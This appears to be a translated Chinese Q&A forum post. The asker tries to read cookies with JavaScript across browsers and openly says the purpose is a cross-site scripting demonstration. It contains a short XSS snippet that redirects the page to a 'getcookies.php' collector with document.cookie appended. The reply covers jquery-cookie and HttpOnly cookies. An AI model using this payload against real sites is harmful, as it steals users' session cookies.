我必须使用JavaScript读取cookie。我正在使用document.cookie来做同样的事情。但该方法仅适用于Google Chrome,而不适用于Firefox和IE 8/9。所有网页都显示document.cookie作为一种方式。
如何使用JavaScript在Firefox和IE中获取Cookie?
由于
更新 我在localhost上测试了我的代码。在 blogspot.com 上在线测试代码时,它甚至不能用于Chrome。
任何方式,这是HTML代码:
<script type="text/javascript">
function sendCookies(){
document.location='http://localhost/xss/getcookies.php?cookie='+escape(document.cookie);
}
</script>
<a onclick="sendCookies()" href="#">
click here </a> to know about XSS attack.
在浏览器中调试document.cookie时,它仅在Chrome中显示值。如果我将localhost链接替换为在线链接,则document.cookie为空,即使在Chrome上也是如此。
你可能的猜测是正确的。这是一种跨站点脚本攻击。
对此代码有任何帮助对我有用吗?
更新2:
以下是显示如何执行XSS攻击的视频链接:
答案 0 :(得分:2)
你尝试过使用jquery-cookie吗? https://github.com/carhartl/jquery-cookie 另外,请记住,您无法使用javascript读取仅限http的cookie。但是,如果您可以在Chrome中读取cookie,则它不是仅限http的cookie。您可以通过转到chrome中调试控制台中的resources选项卡检查cookie是否为http-only,并检查HTTP列是否有cookie的刻度标记。